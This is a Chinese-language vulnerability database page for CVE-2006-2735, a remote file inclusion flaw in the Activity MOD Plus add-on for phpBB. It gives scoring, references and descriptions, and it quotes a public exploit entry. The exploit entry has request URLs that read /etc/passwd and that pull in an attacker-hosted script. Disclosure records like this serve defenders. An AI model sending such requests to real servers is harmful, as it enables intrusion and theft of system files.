CVE-2006-2735
CVSS5.1
发布时间 :2006-06-01 06:02:00
修订时间 :2011-03-07 21:36:53
NMCOE    

[原文]PHP remote file inclusion vulnerability in language/lang_english/lang_activity.php in Activity MOD Plus (Amod) 1.1.0, as used with phpBB when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. NOTE: This is a similar vulnerability to CVE-2006-2507.


[CNNVD]Activity MOD Plus Lang_Activity.PHP 远程文件包含漏洞(CNNVD-200606-033)

        Activity MOD Plus (Amod) 1.1.0中language/lang_english/lang_activity.php存在PHP远程文件包含漏洞,当和phpBB一起使用且register_globals启用时,远程攻击者可通在phpbb_root_path参数内的URL来执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2735
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2735
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-033
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/20354
(VENDOR_ADVISORY)  SECUNIA  20354
http://www.vupen.com/english/advisories/2006/2045
(UNKNOWN)  VUPEN  ADV-2006-2045
http://www.securityfocus.com/archive/1/archive/1/435298/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060529 RE: Advisory: Blend Portal <= 1.2.0 for phpBB 2.x(blend_data/blend_common.php) File Inclusion Vulnerability
http://www.securityfocus.com/archive/1/archive/1/435286/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060528 Advisory: phpBB 2.x (Activity MOD Plus) File InclusionVulnerability.
http://www.nukedx.com/?viewdoc=38
(VENDOR_ADVISORY)  MISC  http://www.nukedx.com/?viewdoc=38
http://www.nukedx.com/?getxpl=38
(UNKNOWN)  MISC  http://www.nukedx.com/?getxpl=38
http://phpbb-tweaks.com/topics.html-p-17623#17623
(UNKNOWN)  CONFIRM  http://phpbb-tweaks.com/topics.html-p-17623#17623
http://xforce.iss.net/xforce/xfdb/26857
(UNKNOWN)  XF  activitymodplus-multiple-file-include(26857)
http://www.securityfocus.com/bid/18155
(UNKNOWN)  BID  18155
http://www.osvdb.org/25821
(UNKNOWN)  OSVDB  25821
http://securityreason.com/securityalert/1001
(UNKNOWN)  SREASON  1001
http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0709.html
(UNKNOWN)  FULLDISC  20060528 Advisory: phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability.

- 漏洞信息

Activity MOD Plus Lang_Activity.PHP 远程文件包含漏洞
中危 输入验证
2006-06-01 00:00:00 2006-06-01 00:00:00
远程  
        Activity MOD Plus (Amod) 1.1.0中language/lang_english/lang_activity.php存在PHP远程文件包含漏洞,当和phpBB一起使用且register_globals启用时,远程攻击者可通在phpbb_root_path参数内的URL来执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1844)

Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability (EDBID:1844)
php webapps
2006-05-28 Verified
0 nukedx
N/A [点击下载]
phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on phpBB 2.x (Activity MOD Plus)
Original advisory can be found at: http://www.nukedx.com/?viewdoc=38

Succesful exploitation needs register_globals on
GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]
EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00
Requires magic_quotes_gpc off
EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
Requires allow_url_fopen on

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]
		

- 漏洞信息

25821
Activity Mod Plus for phpBB phpbb_root_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Unknown

- 漏洞描述

Activity Mod Plus contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to language/lang_english/lang_activity.php not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-28 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, phpbb-amod.com has released code modification instructions to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站